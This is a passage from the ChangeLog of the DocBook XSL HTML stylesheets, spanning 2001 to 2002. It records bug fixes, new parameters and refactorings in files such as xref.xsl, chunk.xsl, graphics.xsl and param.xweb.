Remove 'article' from the catch-all template match in mode=xref-to - because it is already covered in another xref-to template, - leading to an ambigious selection of template. - -2002-07-10 Norman Walsh - - * chunker.xsl: Repeat after me: you cannot use xsl:attribute on intruction elements, you cannot use... - - * graphics.xsl: Refactor calls to getWidth() and getDepth() to work around XSLTC bugs - -2002-07-09 Norman Walsh - - * biblio.xsl: Don't output square brackets if there's no biblioentry label - - * synop.xsl: Bug #573726: fix cmdsynopsisref formatting - -2002-07-08 Norman Walsh - - * autoidx.xsl: Bug #574840: fix bug where some symbol index terms got lost - - * autoidx.xsl: Bug #574841: trim leading and trailing whitespace from primary/secondary/tertiary index terms - - * graphics.xsl: Work-around bug in xsltproc: explicitly cast scale to a number() before comparing it to 1.0 - - * html-rtf.xsl, verbatim.xsl: Bug #567130: make sure literallayout children don't get lost - -2002-07-08 Robert Stayton - - * xref.xsl: Moved the target.database parameter to be the first - child in the olink template. - -2002-07-07 Norman Walsh - - * chunk-common.xsl, chunk.xsl: First tentative stab at getting ToCs and LoTs into separate chunks--does not work - - * footnote.xsl: Fix footnotes in table titles - - * lists.xsl: Fix ugly bug: make sure premables to orderedlist and itemizedlist elements are actually formatted - -2002-07-06 Robert Stayton - - * graphics.xsl: Bug fix for inlinegraphic not being inline. - The test for setting $viewport to 0 was - test="inlinegraphic - | ancestor::inlinemediaobject - | ancestor::inlineequation" - when it should be: - test="local-name(.) = 'inlinegraphic' - or ancestor::inlinemediaobject - or ancestor::inlineequation" - Now inlinegraphics are inline. - - * xref.xsl: Added $verbose parameter to default xref-to template - so olink target collection can be quiet for elements - that don't have an xref-to. - Also fixed a line break in an olink error message. - -2002-07-05 Robert Stayton - - * chunk.xsl: Modified for new stylesheet olink system. - Checks the collect.xref.targets parameter and - runs the target collection process if selected. - Default is to not run the collection process. - - * docbook.xsl: Modified for the new stylesheet olink system. - Checks the collect.xref.targets parameter and runs - the target data collection process if selected. - Default is to not run the collection process. - - * param.ent: Added seven new parameters for the new stylesheet olink system: - target.database.document - targets.filename - collect.xref.targets - olink.base.uri - use.local.olink.style - current.docid - olink.doctitle - - * param.ent, param.xweb: Removed references to the chunk.datafile parameter, - because Norm removed that parameter due to - obsolescence. - - * param.xweb: Added seven parameters for the new stylesheet olink system: - target.database.document - targets.filename - collect.xref.targets - olink.base.uri - use.local.olink.style - current.docid - olink.doctitle - - * xref.xsl: Modified to use new stylesheet olinks. - Extended the olink template for the new targetdoc and - targetptr attributes. - Loads the target database into keys for quick lookups. - -2002-07-04 Norman Walsh - - * xref.xsl: Feature req #525507: support xref to para by using the nearest containing section as the generated text - -2002-07-03 Norman Walsh - - * chunk-common.xsl, param.ent, param.xweb: Use header.rule and footer.rule parameters when building page navigation - - * docbook.xsl: Feature Req #502932: added root.messages template for user defined messages - -2002-06-29 Norman Walsh - - * formal.xsl, lists.xsl: Make list/procedure titles use gentext and have consisten formatting - -2002-06-28 Norman Walsh - - * chunk-common.xsl: Fix footnote context error (Felix Rabe) - -2002-06-27 Norman Walsh - - * footnote.xsl: Make sure function-available is used around the node-set extension function - -2002-06-27 Jirka Kosek - - * footnote.xsl: Fixed typo - -2002-06-27 Norman Walsh - - * table.xsl: Whitespace - -2002-06-26 Norman Walsh - - * inline.xsl, xref.xsl: Unwrap nested links - - * table.xsl: Rework the CSS table-border properties so that all three don't have to be specified at once - -2002-06-16 Norman Walsh - - * chunker.xsl: Turn off omit-xml-declaration, for what it's worth, in text mode - - * table.xsl: Added PI for cellspacing and cellpadding; also added currently useless Python extension hooks - -2002-06-13 Jirka Kosek - - * Makefile.param: Added parameter for disabling HTML output when testing various HTML Help features. - - * Makefile.param: New features. A lot of new features. For HTML Help. - -2002-06-13 Norman Walsh - - * chunker.xsl: Use the new chunking parameters: NOTE WELL: they are described in param.xweb but actually defined in chunker.xsl to make it independent - -2002-06-13 Jirka Kosek - - * chunker.xsl: Modified output attributes for text chunks as Saxon doesn't like empty values for them. - -2002-06-13 Norman Walsh - - * html-rtf.xsl: Renamed a template - - * inline.xsl: Changed test condition for xlink: simple links - - * manifest.xsl, math.xsl, param.ent: Use the new chunking parameters: NOTE WELL: they are described in param.xweb but actually defined in chunker.xsl to make it independent - -2002-06-13 Jirka Kosek - - * param.ent: Added parameter for disabling HTML output when testing various HTML Help features. - - * param.ent: New features. A lot of new features. For HTML Help. - -2002-06-13 Norman Walsh - - * param.xweb: Use the new chunking parameters: NOTE WELL: they are described in param.xweb but actually defined in chunker.xsl to make it independent - -2002-06-13 Jirka Kosek - - * param.xweb: Added parameter for disabling HTML output when testing various HTML Help features. - - * param.xweb: New features. A lot of new features. For HTML Help. - -2002-06-12 Jirka Kosek - - * chunk-common.xsl, param.ent, param.xweb: Added new parameters suppress.{footer|header}.navigation for separate control over navigation bar in footer and header. - -2002-06-11 Norman Walsh - - * formal.xsl: Make sure formal objects have an anchor - - * graphics.xsl: Don't put alt on object or embed - - * graphics.xsl: Don't output viewport table if it isn't going to do anything useful - - * graphics.xsl, param.ent, param.xweb: Made new parameters public - - * html-rtf.xsl: Fix list of block elements and support xhtml - - * html-rtf.xsl: When unwrapping; don't produce empty elements if there's no need - - * xref.xsl: Experimental support for xrefstyle - -2002-06-09 Norman Walsh - - * docbook.xsl: Feature req #565822: support multiple html.stylesheets - - * docbook.xsl: Patch #565199: fix quotation marks in draft URL generation in CSS - -2002-06-06 Norman Walsh - - * docbook.xsl: Add support for HTML META name=description from abstract - - * param.ent, param.xweb: New parameters: generate.meata.abstract and use.role.as.xrefstyle - -2002-06-03 Jirka Kosek - - * Makefile: Added dependencies for profiling stylesheets - -2002-05-23 Norman Walsh - - * graphics.xsl, param.ent, param.xweb: Support for SVG in HTML - - * html-rtf.xsl: Protect calls to extension functions behind function-available tests - -2002-05-21 Norman Walsh - - * qandaset.xsl: Fix anchors for references to QandAEntrys. Output '. ' in some contexts (this is a hack) - -2002-05-17 Norman Walsh - - * onechunk.xsl: Make TOC (and other internal references) all just fragment identifiers...we're making one chunk after all - -2002-05-16 Norman Walsh - - * autotoc.xsl, html.xsl: Moved href.target to html.xsl; added href.target.uri (which is functionally equivalent to href.target in the non-chunking case) - -2002-05-15 Norman Walsh - - * chunk.xsl, onechunk.xsl: Fix bugs in onechunk---it wasn't working at all - -2002-05-14 Norman Walsh - - * graphics.xsl: Bug #555809: make sure that a longdesc, if written, gets the correct relative URI - -2002-05-13 Norman Walsh - - * chunk-common.xsl: Fix inherited directory naming problems when using dbhtml. Add context to site navigation link calls - - * chunk-common.xsl, param.ent, param.xweb: Add extra LINK elements to the HTML HEAD of chunked output (for enhanced site navigation as per Mozilla 1.0) - - * chunker.xsl: Work around relative filename bug in libxslt - - * pi.xsl: Try to avoid x//y in inherited dbhtml dir settings - -2002-05-12 Norman Walsh - - * block.xsl: Support title on blockquote - - * chunk.xsl: Turn off refentry.separator by default when chunking - - * chunk.xsl: Fix ugly prev/next bug introduced by my attempt to work around Xalan problems - - * graphics.xsl: Reworked support for graphic attributes; now support DocBook 4.2CR1 attributes - - * html.xsl: Remove reference to obsolete using.chunker parameter - - * math.xsl: Support MathML by passing it through unchanged - - * param.ent, param.xweb: Added points.per.em; removed obsolete using.chunker - - * table.xsl: Improve support for table borders drawn with CSS (get the semantics right); add support for entry-bgcolor PI - - * verbatim.xsl: Format literal layout elements correctly when linenumbering - - * xref.xsl: Support xref to refnamediv and all elements with titles (at least when they have titles) - -2002-05-10 Jirka Kosek - - * chunk.xsl: Added support for manifest file as requested by Nik in #552945 - -2002-05-10 Norman Walsh - - * lists.xsl: Remove reference to obsolete using.chunker parameter - -2002-05-10 Jirka Kosek - - * manifest.xsl, param.ent, param.xweb: Added support for manifest file as requested by Nik in #552945 - -2002-05-10 Norman Walsh - - * pi.xsl: Remove reference to obsolete using.chunker parameter - -2002-05-07 Robert Stayton - - * chunk.xsl: The call to write.chunk did not have the $chunk.quietly parameter set. - I think I failed to commit that change after testing it in Feb. - - * xref.xsl: Added a template for article in mode="xref-to" that is similar - to the one for chapter. Now you can use with a linkend - pointing to an article. - -2002-05-06 Norman Walsh - - * chunk.xsl, onechunk.xsl: Fix bug #551966 applying onechunk to book - -2002-04-30 Norman Walsh - - * chunk.xsl: First attempt to workaround Xalan array-out-of-bounds bug - -2002-03-25 Norman Walsh - - * autotoc.xsl, chunk-common.xsl, pi.xsl: Handle links across dbhtml-specified relative directories correctly - - * formal.xsl: Support longdesc on tables - - * table.xsl: Use the textobject/phrase for the table summary attribute, if one is present - -2002-03-24 Norman Walsh - - * graphics.xsl: Remove style from longdesc link; added support for textdata in textobject - - * inline.xsl: Support personname - - * xref.xsl: Handle xref to editor, othercredit, and personname - -2002-03-21 Norman Walsh - - * biblio.xsl, titlepage.xsl: Support biblioid - -2002-03-18 Norman Walsh - - * Makefile, autotoc.xsl, component.xsl, division.xsl, param.ent, param.xweb, qandaset.xsl, refentry.xsl, sections.xsl: - Replace generate.*.toc and generate.*.lot with single generate.toc parameter. - - * autotoc.xsl: Fix ToC section depth calculation - -2002-03-15 Norman Walsh - - * synop.xsl: Improve appearance of classsynopsis elements - -2002-03-14 Norman Walsh - - * .cvsignore: Ignore profiling stylesheets - - * Makefile: Make profiling onechunk - - * admon.xsl, autoidx.xsl, autotoc.xsl, biblio.xsl, block.xsl, callout.xsl, changebars.xsl, chunk-common.xsl, chunk.xsl, chunker.xsl, chunktoc.xsl, component.xsl, division.xsl, docbook.xsl, ebnf.xsl, footnote.xsl, formal.xsl, glossary.xsl, graphics.xsl, html-rtf.xsl, html.xsl, index.xsl, info.xsl, inline.xsl, keywords.xsl, lists.xsl, maketoc.xsl, math.xsl, oldchunker.xsl, onechunk.xsl, param.ent, param.xweb, pi.xsl, qandaset.xsl, refentry.xsl, sections.xsl, synop.xsl, table.xsl, titlepage.templates.xml, titlepage.xsl, toc.xsl, verbatim.xsl, xref.xsl: - Whitespace only: change CR/LF back to LF. Norm was a total moron. - - * admon.xsl, autoidx.xsl, autotoc.xsl, biblio.xsl, block.xsl, callout.xsl, changebars.xsl, chunk-common.xsl, chunk.xsl, chunker.xsl, chunktoc.xsl, component.xsl, division.xsl, docbook.xsl, ebnf.xsl, footnote.xsl, formal.xsl, glossary.xsl, graphics.xsl, html-rtf.xsl, html.xsl, index.xsl, info.xsl, inline.xsl, keywords.xsl, lists.xsl, maketoc.xsl, math.xsl, oldchunker.xsl, onechunk.xsl, param.ent, param.xweb, pi.xsl, qandaset.xsl, refentry.xsl, sections.xsl, synop.xsl, table.xsl, titlepage.templates.xml, titlepage.xsl, toc.xsl, verbatim.xsl, xref.xsl: - Whitespace changes only: use PC-style CR/LF because Unix clients choke on this far less often than PC clients choke on the reverse. Grrr. - - * block.xsl: Generate anchors before the formal.object.heading, not within it; support formal.title.placement - - * formal.xsl, lists.xsl, param.ent, param.xweb: Support formal.title.placement - - * lists.xsl, titlepage.xsl: Handle revisionflag a little better on copyrights - - * titlepage.xsl: Generate anchors before the formal.object.heading, not within it - -2002-03-13 Norman Walsh - - * footnote.xsl: Fix debugging error - - * footnote.xsl: Numerate footnotes and table footnotes correctly - - * lists.xsl: Bug #516227: segmentedlist/titles - - * refentry.xsl: Process refsynopsisdiv titles in their own template so they don't get default title processing - - * table.xsl: Make tfoot come out before tbody; even in HTML it's supposed to be that way - - * verbatim.xsl: Improve efficiency of make-verbatim; thanks to Paul Grosso, John Dreystadt, et. al. - -2002-03-12 Robert Stayton - - * callout.xsl: Modified match="co" template to use its linkends attribute - to form a hotlink to the callout element, forming the - two-ways links as described in - The Definitive Guide. At this time, only a single linkend - value is supported, since HTML doesn't handle multiply-targeted - links. - -2002-03-11 Jirka Kosek - - * footnote.xsl: Fixed bug #520995. Removed duplicated footnote numbers. - -2002-03-10 Norman Walsh - - * biblio.xsl: Support the new generate.id.attributes parameter to prevent generating both div ID and a NAME attributes; also suppress revhistory in bibliographies - - * component.xsl, division.xsl, glossary.xsl, index.xsl, param.ent, param.xweb: - Support the new generate.id.attributes parameter to prevent generating both div ID and a NAME attributes - - * inline.xsl: Use em instead of i for emphasis - - * onechunk.xsl: Update onechunk to the new chunking scheme - -2002-03-07 Robert Stayton - - * autotoc.xsl: Modified refentry to use mode=title.markup rather than mode=title - so indexterms are not included in the TOC entries for refentry. - -2002-03-03 Jirka Kosek - - * Makefile.param, param.ent, param.xweb: Added new stylesheet parameters for profiling. - -2002-03-01 Jirka Kosek - - * Makefile, Makefile.param: First portion of new profiling code. New stylesheet parameters will come later. - -2002-03-01 Norman Walsh - - * docbook.xsl: Move stylesheet.result.type out of param and put it explicitly in each stylesheet because it has to be different - - * graphics.xsl: Handle the case where graphics in inlineequations are inline - - * param.ent: Removed stylesheet.result.type reference - - * param.xweb: Added fragref for chunk.quietly - - * titlepage.xsl: Added DIV wrappers to author and authorgroup for CSS styling - -2002-02-25 Robert Stayton - - * chunker.xsl, chunktoc.xsl, graphics.xsl, param.ent, param.xweb, titlepage.xsl: - Added chunk.quietly parameter and altered the calls - to write.chunk to set the 'quiet' param to that value. - -2002-02-21 Jirka Kosek - - * Makefile.param, math.xsl, param.ent, param.xweb: Better control over delimiters for TeX equations. Added parameter tex.math.delims, when is set to 0, no delimiters (like $ and $$) are output. Same can be done for single equation by . - -2002-02-20 Norman Walsh - - * autotoc.xsl: Fix toc-depth bug in recursive sections - -2002-02-10 Jirka Kosek - - * Makefile.param, param.ent, param.xweb: Added parameter htmlhelp.default.topic for overriding default topic to display. - -2002-02-09 Jirka Kosek - - * Makefile.param, param.ent, param.xweb: Added parameter which controls appearance of root element in HTML Help ToC. - -2002-02-07 Norman Walsh - - * autotoc.xsl, chunk-common.xsl, chunk.xsl, chunktoc.xsl, maketoc.xsl, param.ent, param.xweb: - Added experimental manual TOC processing for chunking and TOC generation - - * calc-chunks.xsl, chunk-experimental.xsl, expchunk.xsl: - Deleting old experiments - - * docbook.xsl: Tweaked rendering of 'draft' watermark - -2002-02-03 Jirka Kosek - - * Makefile.param, param.ent, param.xweb: Added parameter htmlhelp.title for manual control over HTML Help title. Improved code for automatic extraction of title from document. - -2002-01-29 Norman Walsh - - * docbook.xsl, param.ent, param.xweb: Support 'draft' watermark - -2002-01-28 Norman Walsh - - * biblio.xsl, block.xsl, docbook.xsl, footnote.xsl: Bug #503271: output biblioentry.item.separator after citetitle - - * block.xsl, footnote.xsl, html-rtf.xsl, param.ent, param.xweb: - Added html.cleanup parameter; if non-zero, do some post-processing of RTFs to improve formatting - -2002-01-22 Jirka Kosek - - * param.ent, param.xweb: Feature request #507087. Added parameter for controling appearance of icons in HTML Help ToC. - -2002-01-21 Jirka Kosek - - * biblio.xsl: Fixed bug #505683. Changed to to make output compatible with XHTML. - -2002-01-10 Norman Walsh - - * graphics.xsl, param.ent, param.xweb: Use the pixels.per.inch parameter - -2002-01-09 Norman Walsh - - * graphics.xsl: Convert graphic widths/depths to pixels - -2002-01-08 Norman Walsh - - * chunk.xsl: Make root.filename supercede use.id.as.filename - - * titlepage.xsl: Added template for confsponsor - -2002-01-04 Norman Walsh - - * glossary.xsl, inline.xsl: Make glossary.collection (usually) work when chunking is used; allow the use of glossdivs to be toggled in the document - - * glossary.xsl, inline.xsl, param.ent, param.xweb: First cut at supporting a glossary.collection file - -2002-01-03 Norman Walsh - - * .cvsignore, Makefile.param: Makefile.param is auto generated - - * lists.xsl, param.ent, param.xweb: Use global parameter variablelist.as.table - -2002-01-01 Norman Walsh - - * changebars.xsl: Fix typo - - * chunker.xsl: Use output.method parameter - - * footnote.xsl: Number footnotes in refentrys individually; add priority to match on first para of a footnote - - * lists.xsl: Improve list formatting - - * param.ent, param.xweb: Added new parameters: make.valid.html, refentry.generate.title, and output.method; removed unused parameter callout.unicode.font - - * refentry.xsl: Improve refentry formatting - - * synop.xsl: Made several synopsis elements inline and reworked the formatting code accordingly - - * titlepage.xsl: Fix formatting of copyright with multiple holders - - * xref.xsl: Added target parameter to link - -2001-12-15 Jirka Kosek - - * graphics.xsl, math.xsl: Improved support for TeX math inside equations. - -2001-12-06 Jirka Kosek - - * Makefile.param, docbook.xsl, math.xsl, param.ent, param.xweb: - Added support for TeX math in alt element. When using PassiveTeX, TeX equations can be directly passed to TeX. When using HTML, TeX file with code necessary to produce image equivalents of equations is generated. - - * chunk.xsl, chunker.xsl: Template write.text.chunk moved to common place. - -2001-12-04 Norman Walsh - - * Makefile, Makefile.param, chunk.xsl, param.ent, param.xweb: - Fix chunking parameter errors - - * Makefile, Makefile.param, param.ent, param.xweb: Updated parameters and parameter consistency checking - - * changebars.xsl: Feature #481981: support simpara and formalpara in changebars.xsl - - * chunk-experimental.xsl: More hacking - - * chunk.xsl: Feature #477348: support chunk.section.depth (lots and lots of changes here: danger will robinson) - - * xref.xsl: Feature #481793: support xref to refentry - -2001-12-02 Norman Walsh - - * component.xsl: Allow inlines and anchors in titles - -2001-12-01 Norman Walsh - - * changebars.xsl, table.xsl: Bug #472836: @revisionflag and table entries - - * qandaset.xsl: Improve FAQ labeling - -2001-11-29 Norman Walsh - - * lists.xsl: Patch #478068: procedures with one step - -2001-11-28 Norman Walsh - - * lists.xsl, param.ent: Support formatting segmented lists as tables - - * param.ent: Added punct.honorific parameter - -2001-11-28 Jirka Kosek - - * param.ent: Added parameter htmlhelp.hhc.section.depth for controlling depth of sections in a TOC in a left pane of HTML Help viewer. - - * param.ent, param.xweb: Added support for automatic generation of map and context files for HTML Help. Topic names and IDs are marked by special PI . - -2001-11-28 Norman Walsh - - * param.xweb: Support formatting segmented lists as tables - - * param.xweb: Added punct.honorific parameter - -2001-11-28 Jirka Kosek - - * param.xweb: Added parameter htmlhelp.hhc.section.depth for controlling depth of sections in a TOC in a left pane of HTML Help viewer. - -2001-11-28 Norman Walsh - - * pi.xsl: Use common pi-attribute template - -2001-11-27 Norman Walsh - - * lists.xsl: Support tabular presentation of variablelists - - * qandaset.xsl: Format QandASet as a table; there's just no other way to get the formatting right without resorting to absurd hackery - - * refentry.xsl: Fixed typo in refentry separator test - -2001-11-18 Jirka Kosek - - * Makefile, glossary.xsl, inline.xsl, param.ent, param.xweb: - Added parameter glossterm.auto.link. When set to 1 links from glossterm to glossentry are created automatically even if there is no linkend attribute on glossterm and id attribute on glossentry. - - * inline.xsl: Baseform attribute is taken into account when autogenerating links for glossterms. - -2001-11-15 Norman Walsh - - * graphics.xsl: Only output a longdesc link if there's actually a longdesc - - * inline.xsl: Support experimental XLink support - -2001-11-12 Norman Walsh - - * chunk-experimental.xsl, chunk.xsl, docbook.xsl, ebnf.xsl, footnote.xsl, inline.xsl, lists.xsl, param.xweb, synop.xsl, toc.xsl, xref.xsl: - Support well-formed documents, use key() instead of id() - - * param.xweb: Added fragref for navig.* params - -2001-11-10 Norman Walsh - - * titlepage.xsl: Fixed formatting of addresses in affiliations in author names - -2001-11-09 Norman Walsh - - * param.xweb: Move the obvious ID value from the src:fragment to the refentry in parameter reference pages - -2001-11-06 Robert Stayton - - * chunk.xsl: Modified header and footer templates to support option - to use graphical icons for navigation. - - * param.ent, param.xweb: Added new parameters supporting the option for graphical - icons in navigational headers and footers of chunked html. - -2001-11-05 Jirka Kosek - - * param.ent: Parameters moved to params subdirectory. - -2001-11-05 Norman Walsh - - * param.ent: Added newline at eof - -2001-11-05 Jirka Kosek - - * param.xweb: Parameters moved to params subdirectory. - -2001-11-03 Norman Walsh - - * biblio.xsl, inline.xsl: Support pubwork=article on citetitle - - * xref.xsl: Remove anchor name on anchor; it erroneously duplicates the html anchor template - -2001-10-16 Norman Walsh - - * Makefile, graphics.xsl, param.ent, param.xweb: Support HTML longdesc using textobject content - - * table.xsl: Table support improvements - -2001-10-15 Norman Walsh - - * inline.xsl: Fix formatting of keycombo - - * param.ent, param.xweb, table.xsl: Fix calculation of rowsep and colsep; added experimental support for table.borders.with.css in HTML; calculation of alignments needs to be added along the same lines - -2001-10-14 Norman Walsh - - * table.xsl: Fixed a number of significant outstanding table problems; I think HTML and FO now format all combinations of spans and missing cells correctly. But the border drawing isn't perfect on FO tables yet. - -2001-10-12 Norman Walsh - - * biblio.xsl: Tweaked bibliography formatting to include the labels - - * param.ent, param.xweb: Fixed some missing references - - * xref.xsl: Tweaked cross reference stuff to prevent square brackets on biblio xrefs from being underlined (it just looks ugly) - -2001-10-11 Norman Walsh - - * autoidx.xsl, docbook.xsl: Moved autoidx.xsl (and chunker.xsl) directly into docbook.xsl - - * chunk-common.xsl, chunk.xsl: Moved chunk-common into chunk; there's no need for a separate common file anymore - - * chunker.xsl: Removed some out-of-date comments - - * index.xsl: Removed empty generate-index function; we're now using autoidx all the time - - * titlepage.xsl: Moved support for generate.legalnotice.link directly into titlepage.xsl - -2001-10-08 Norman Walsh - - * param.xweb: Added fragrefs for new params - -2001-10-07 Norman Walsh - - * .cvsignore: Added param.html to ignore list - - * .cvsignore, Makefile, param.ent, param.xsl, param.xweb: - Generate params from an xweb file - - * autotoc.xsl, calc-chunks.xsl, chunk-common.xsl, chunk-experimental.xsl, chunker.xsl, ebnf.xsl: - Removed all top-level parameters; they're now all in param.xsl - -2001-10-06 Norman Walsh - - * callout.xsl: Use function-available to select callout extension function - - * component.xsl: Make component ids unconditional - - * graphics.xsl: Use function-available to select text-insert extension function - - * inline.xsl: Make sure all the variants of sgmltag have a class attribute - - * refentry.xsl: Make anchors unconditional, support a separator between refentrys - - * table.xsl: Use function-available to select extension functions - - * titlepage.templates.xml: Added refentry titlepages, but note that refentrys don't usually have one, they usually begin with the Name section - - * titlepage.xsl: Added refentry.titlepage.{recto,verso}.style properties - - * verbatim.xsl: Use function-available to select verbatim extension function - - * xref.xsl: Added names to the link templates so that they can be called that way - - * xtchunk.xsl, xtchunker.xsl: No point keeping the XT files now that I'm using function-available - -2001-09-26 Norman Walsh - - * admon.xsl, biblio.xsl, block.xsl, callout.xsl, component.xsl, division.xsl, ebnf.xsl, formal.xsl, glossary.xsl, graphics.xsl, html.xsl, index.xsl, inline.xsl, lists.xsl, qandaset.xsl, refentry.xsl, sections.xsl, synop.xsl, table.xsl, verbatim.xsl, xref.xsl: - Bug #464487: use (new) anchor template to consistently generate HTML anchors (usually conditionally, in other words, only for elements that actually have an ID) - -2001-09-25 Norman Walsh - - * chunk-common.xsl: Fix gentext.nav.* templates - - * param.xsl, titlepage.xsl: Support automatic collation of year ranges in copyright - -2001-09-24 Norman Walsh - - * refentry.xsl, synop.xsl: Added some paras to improve spacing - - * verbatim.xsl: Implemented changes suggested by Paul Winder, Sam Brow, and John Dreystadt of Arbortext to make 'make-verbatim' less memory intensive; also added paras to literallayout and address divs for better spacing in NS6 - -2001-09-22 Norman Walsh - - * changebars.xsl: sgmltag is an inline - - * chunk-common.xsl: Feature request #439053: support generate.legalnotice.link - - * xref.xsl: Bug #463033: allow xref to list items (in orderedlists) and varlistentrys - - * xref.xsl: Bug #462830: allow %p in templates - -2001-09-09 Norman Walsh - - * onechunk.xsl: New file. - -2001-08-29 Norman Walsh - - * lists.xsl: Fix orderedlist numerations - -2001-08-25 Norman Walsh - - * sections.xsl: Bug #451005: no id anchor for bridgehead - -2001-08-14 Norman Walsh - - * xref.xsl: Display the ID when gentext cannot be created - -2001-08-11 Robert Stayton - - * param.xsl: Removed the '?' from olink resolver parameter because - the olink template will add that (or not, depending on - how that template is customized). - -2001-08-08 Norman Walsh - - * param.xsl, verbatim.xsl: Support shade.verbatim parameter - -2001-08-05 Norman Walsh - - * param.xsl: Removed the FormatDingbatCallout classes, they were the same as the FormatUnicodeCallout classes but with a font wrapper. Added a callout.unicode.font parameter to wrap Unicode callouts - -2001-08-04 Norman Walsh - - * autotoc.xsl: Add '.' to the autotoc.label.separator; suppress the separator if there is no label - - * chunker.xsl: Added a quiet parameter to suppress the Writing... message - - * refentry.xsl: Don't output anchor for refsect*, the anchor is output as part of the title processing - -2001-08-02 Norman Walsh - - * sections.xsl: Allow anchors in section titles - -2001-08-02 Robert Stayton - - * xref.xsl: Changed to process its endterm if the element content - is empty. - -2001-08-01 Norman Walsh - - * component.xsl: Don't calculate ids where they aren't used; don't put ids on divs because anchors will be output in the component title - - * footnote.xsl: Process simpara in footnote; warn if something unexpected turns up in a footnote - - * formal.xsl: Allow anchors in formal object titles - - * graphics.xsl: Output anchors for images that have IDs - - * lists.xsl: Output anchors for list elements with IDs - - * param.xsl: Leave ../ out of graphics paths by default; that doesn't make sense anymore - - * param.xsl, xref.xsl: First crude beginnings of olink support - - * qandaset.xsl: Remove unnecessary spaces - - * titlepage.templates.xml: Don't suppress othercredit on titlepages - - * titlepage.xsl: Handle othercredits on title pages - -2001-07-21 Norman Walsh - - * block.xsl, param.xsl: Fix title-end punctuation problems on formalparas - -2001-07-17 Jirka Kosek - - * graphics.xsl: Fixed bug #442160. Parameter graphic.default.extension is now used also for and not only for . - -2001-07-17 Robert Stayton - - * xref.xsl: xref element with endterm attribute now uses normal templates - to process the children of the element pointed to by the endterm - ID. Formerly it just used the built-in template and rendered - just the text nodes. - -2001-07-16 Norman Walsh - - * inline.xsl, param.xsl: Added phrase.propagates.style and emphasis.propagates.style: if true, wrap a span around phrase and emphasis elements with the role attribute propagated to the class attribute - -2001-07-16 Robert Stayton - - * sections.xsl: added null templates for section titleabbrev in normal mode - -2001-07-16 Norman Walsh - - * table.xsl: Wrap tbody around table footnotes (so that the HTML table model is not broken) - -2001-07-15 Norman Walsh - - * param.xsl: Make generate.section.toc.level 0 by default - -2001-07-10 Norman Walsh - - * chunk.xsl: Remove extension namespace declarations; they aren't actually used in this module - - * chunker.xsl: Fix EXSLT namespace name for exsl:document element - - * chunker.xsl: Make exsl:document the first choice - - * chunker.xsl, oldchunker.xsl, param.xsl: Move declaration for default.encoding and saxon.character.representation from param.xsl to (old)chunker.xsl so that chunker.xsl can be used by any stylesheet (indepedent of docbook.xsl). Maybe this should get moved to lib... - - * pi.xsl: Irrelevant encoding change - -2001-07-09 Norman Walsh - - * autotoc.xsl: Fixed typo in reference to annotate.toc variable - -2001-07-08 Norman Walsh - - * calc-chunks.xsl, chunk-experimental.xsl: Break chunk calculation and chunking into two tasks; *requires* every chunk to have an ID - - * chunker.xsl: Use element-available function not vendor to find chunking elements - - * exsltchunk.xsl, exsltchunker.xsl: These have been integrated into the regular chunker now that it's based on extension-available() - - * keywords.xsl: Tweaked handling of keywords to avoid multiple templates - - * oldchunker.xsl: New file. - - * qandaset.xsl: Improve QandA formatting; make question bold if defaultlabel=none (FR #419315) - - * xref.xsl: Support xref to bridgehead - -2001-07-07 Norman Walsh - - * param.xsl: Added callout.dingbats parameter (for extension support; not really used in HTML) - -2001-07-06 Norman Walsh - - * chunk-experimental.xsl, expchunk.xsl: New file. - -2001-07-05 Norman Walsh - - * block.xsl: Whitespace - - * block.xsl, lists.xsl: FR #422097, make a listitem containing a single simpara output an li with only inline content - - * chunk-common.xsl: Patch #428987, use the id of the root element if use.id.as.filename is non-zero; also chunk a /section properly - - * chunk-common.xsl: Patch #418401, add accesskey attributes to HTML navigation - - * param.xsl, sections.xsl: Change semantics of generate.section.toc.level; 0 no longer means ignored it now means less than 1 :-) - - * param.xsl, sections.xsl: SR #431040, added generate.section.toc.level parameter to control depth of sections which get a TOC - - * titlepage.xsl: Patch #415865, output contrib for authors and othercontribs - -2001-07-04 - - * autotoc.xsl: Support annotated TOCs - - * biblio.xsl, param.xsl, xref.xsl: Support an external bibliography collection - - * chunk-common.xsl, docbook.xsl, param.xsl: Bug #418968: replaced body.attrs attribute-set with body.attributes template - - * component.xsl, sections.xsl: Remove internal references to *.titlepage.recto.mode and *.titlepage.verso.mode - - * ebnf.xsl: Minor presentation bug fixes - - * xref.xsl: Bug #429011, fix xref to qandset elements - -2001-06-22 Norman Walsh - - * docbook.xsl, ebnf.xsl: Support EBNF - - * param.xsl: Remove unused parameter: check.idref - -2001-06-21 Norman Walsh - - * lists.xsl, param.xsl, xref.xsl: Use common code to calculate step numbers; support xref to procedures and steps; added formal.procedures parameter - -2001-06-20 Norman Walsh - - * formal.xsl: Generate formal titles correctly - - * graphics.xsl: Don't put span around inlinemediaobject in programlistings or screens (causes problems with line numbering and callouts) - - * refentry.xsl: Bug 434102: fix refentry inside of chapter and fix refsynopsisdiv formatting in both FO and HTML - - * xref.xsl: Support xref to authorgroup - -2001-06-18 Norman Walsh - - * chunk-common.xsl: Reordered erroneous test: only link to top-level sections, even if the first one is a chunk - -2001-06-17 Norman Walsh - - * exsltchunk.xsl, exsltchunker.xsl: New file. - -2001-06-15 Norman Walsh - - * component.xsl: Handle subtitle in articleinfo - -2001-06-13 Norman Walsh - - * chunk-common.xsl: Make sure the root element gets processed correctly so that it generates the right titlepage - - * component.xsl: Don't output ID attributes on DIVs with required titles since they conflict with the NAME attributes on the subsequently output A tags. - - * docbook.xsl: Pass the current node to user.head.content - - * index.xsl: Updated comment - -2001-06-07 Jirka Kosek - - * lists.xsl: Things preceding steps in procedure are placed before OL list. - -2001-06-04 Norman Walsh - - * lists.xsl: Fixed typo in compact list support; backed out procedure step changes - - * sections.xsl: Fixed CSS typo; clear: all should be clear: both - -2001-06-02 Jirka Kosek - - * lists.xsl: Fixed bug #424926. Things preceding steps in procedure are not placed inside OL list. - -2001-05-23 Norman Walsh - - * component.xsl: Reorganized templates for clarity - - * graphics.xsl: Fix dup. template bug with is.graphic.* - - * titlepage.xsl: Added template for publisher - -2001-05-21 Norman Walsh - - * autotoc.xsl: Make the TOC label/title separator a parameter - - * callout.xsl, verbatim.xsl: Move calculation of linenumber.* parameters into the number.rtf.lines template - - * changebars.xsl: Add link and member as inlines - - * sections.xsl: Refactor the section title code - - * titlepage.templates.xml: Reworked titlepage template processing to support use of more interesting - predicates. - - Note: in previous versions, at most one title, subtitle, or titleabbrev - element would be processed for each title page. In the new design, if you - have multiple title, subtitle, or titleabbrev elements inside an info - wrapper (you shouldn't!), they will 